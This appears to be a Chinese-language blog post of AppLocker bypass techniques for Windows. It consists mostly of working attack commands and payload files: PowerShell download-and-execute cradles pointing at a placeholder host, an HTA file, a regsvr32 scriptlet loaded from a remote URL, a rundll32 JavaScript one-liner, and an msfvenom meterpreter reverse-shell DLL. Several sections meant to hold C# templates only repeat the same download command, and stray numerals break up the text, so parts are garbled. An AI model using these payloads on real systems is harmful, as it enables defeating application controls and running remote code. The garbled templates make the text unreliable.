欢迎光临
我们一直在努力

AppLocker Bypass Techniques

from:
https://www.youtube.com/watch?v=z04NXAkhI4k

0x00 Command 和 Powershell 没被禁用,脚本被禁用

AppLocker-Bypass-Techniques-12 AppLocker Bypass Techniques

1、直接使用cmd powershell执行

Powershell:


IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

Command:


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

2、管道

Powershell:


Get-Content script.ps1 | iex

Command:


cmd.exe /K < payload.bat

3、hta

payload.hta


<HTML>  <HEAD>  <script language="VBScript">     Set objShell = CreateObject("Wscript.Shell")     objShell.Run "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')" </script> </HEAD>  <BODY>  </BODY>  </HTML>

4、Regsvr32.exe

AppLocker-Bypass-Techniques-12 AppLocker Bypass Techniques


regsvr32 /u /n /s /i:payload.sct scrobj.dll

regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll

payload.sct:


<?XML version="1.0"?> <scriptlet> <registration      progid="ShortJSRAT"     classid="{10001111-0000-0000-0000-0000FEEDACDC}" >     <!-- Learn from Casey Smith @subTee -->     <script language="JScript">         <![CDATA[             rat="powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')";         new ActiveXObject("WScript.Shell").Run(rat,0,true);              ]]> </script> </registration> </scriptlet>

5、rundll32

payload:


rundll32.exe javascript:"/../mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")

6、dll/cpl

payload.dll


msfvenom -p windows/meterpreter/reverse_tcp -b '/x00/xff' lhost=192.168.127.132 lport=8888 -f dll -o payload.dll

运行:


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

0将dll重命名为

cpl

,双击运行。

7、nishang 文件backdoor

AppLocker-Bypass-Techniques-12 AppLocker Bypass Techniques

nishang client

http://drops.wooyun.org/tips/8568

0x01 可执行目录

AppLocker-Bypass-Techniques-12 AppLocker Bypass Techniques

通过ps脚本扫描可写入的路径

下载地址:http://go.mssec.se/AppLockerBC

扫描可执行路径:

AppLocker-Bypass-Techniques-12 AppLocker Bypass Techniques

绕过AppLocker执行:

AppLocker-Bypass-Techniques-12 AppLocker Bypass Techniques

0x02 禁用powershell以后

AppLocker-Bypass-Techniques-12 AppLocker Bypass Techniques

配置禁用powershell

AppLocker-Bypass-Techniques-12 AppLocker Bypass Techniques

禁用以后再次打开powershell

AppLocker-Bypass-Techniques-12 AppLocker Bypass Techniques

1、通过.Net执行powershell

通过.Net执行powershell进行绕过:

AppLocker-Bypass-Techniques-12 AppLocker Bypass Techniques

C# templae
powershell.cs


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

1编译exe以后不能直接运行,可以放到可执行目录执行,调用powershell。

2、InstallUtil

AppLocker-Bypass-Techniques-12 AppLocker Bypass Techniques

参考1:http://drops.wooyun.org/tips/8862

参考2: http://drops.wooyun.org/tips/8701

InstallUtil.cs


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

2编译以后用/U参数运行:


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

3

3、Regasm & Regsvcs

AppLocker-Bypass-Techniques-12 AppLocker Bypass Techniques

Regasm.cs


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

4使用方式为:


powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

5

4、nishang 文件backdoor

虽然powershell被禁用了,但是仍然可执行shellcode。可以使用hta,macro等方式进行。

0x03 提权

提权到管理员权限,即可执行突破AppLocker的限制,执行exe和脚本

未经允许不得转载:杂术馆 » AppLocker Bypass Techniques
分享到: 更多 (0)